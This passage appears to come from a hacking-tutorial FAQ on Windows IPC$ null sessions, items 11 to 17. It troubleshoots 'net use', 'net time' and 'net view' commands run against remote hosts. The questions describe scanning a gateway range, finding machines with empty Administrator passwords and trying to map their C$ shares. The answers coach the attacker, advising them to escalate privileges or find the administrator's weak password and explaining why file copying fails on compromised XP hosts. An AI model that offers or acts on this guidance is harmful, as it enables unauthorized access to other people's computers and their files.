11. I established the connection f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" successfully, but when mapping I was asked for a password. What is going on? f:\>net use h: \\*.*.*.*\c$ The password is invalid for \\*.*.*.*\c$. Type the password for \\*.*.*.*\c$: System error 5 has occurred. Access is denied. A: Being asked for a password means your current user's permissions are not enough to map the default share C$; find a way to raise your permissions or find the administrator's weak password! The default shares generally require administrator privileges.
12. I scanned a host with SuperScan and found port 139 open, but why can't I get a null session?
A: You have confused the relationship between IPC$ and port 139. A host that accepts IPC$ connections must have 139 or 445 open, but a host with those ports open does not necessarily allow a null session, because the other side may have closed IPC$ sharing.
13. Most of the hosts in my gateway's range are XP. I scanned with Fluxay and found several with empty Administrator passwords and could connect, but I cannot copy anything; it says error 5. Why?
A: XP is quite secure. In the default security policy, when a local account authenticates over the network it gets Guest permissions, so even if you log in remotely as administrator you only get Guest rights, and of course copying then gives error 5: insufficient permission.
14. I used net use \\192.168.0.2\ipc$ "password" /user:"administrator" successfully, but net use i: \\192.168.0.2\c asks "Type the password for \\192.168.0.2\c". What is going on? I am using administrator; why can't I access it?
A: Although you have administrator privileges, the administrator set the permissions on the C share (note: ordinary shares can have access permissions set; the default shares cannot) and may not have allowed administrator access, hence the above problem.
15. If my own machine has IPC$ prohibited, can I still make IPC$ connections to other machines? What if the Server service is disabled?
A: Neither stops you from initiating IPC$ connections, but this question is best tested yourself.
16. Can you tell me the reason for the following two errors? C:\>net time \\61.225.*.* System error 5 has occurred. Access is denied.
C:\>net view \\61.225.*.* System error 5 has occurred. Access is denied.
A: I was also puzzled when I first met this problem. Error 5 means insufficient permission, but even a null session's permissions suffice for these two commands; why couldn't he do it? Was the connection not established? Later this careless comrade told me that he had indeed forgotten that he had already deleted the IPC$ connection, and then entered the two commands, getting error 5.
17. What is going on here? f:\>net time Could not locate a time-server. More help is available by typing NET HELPMSG 3912.
A: The answer is simple: your command is wrong. It should be net time \\ip; you did not enter the IP address, so of course the server could not be found.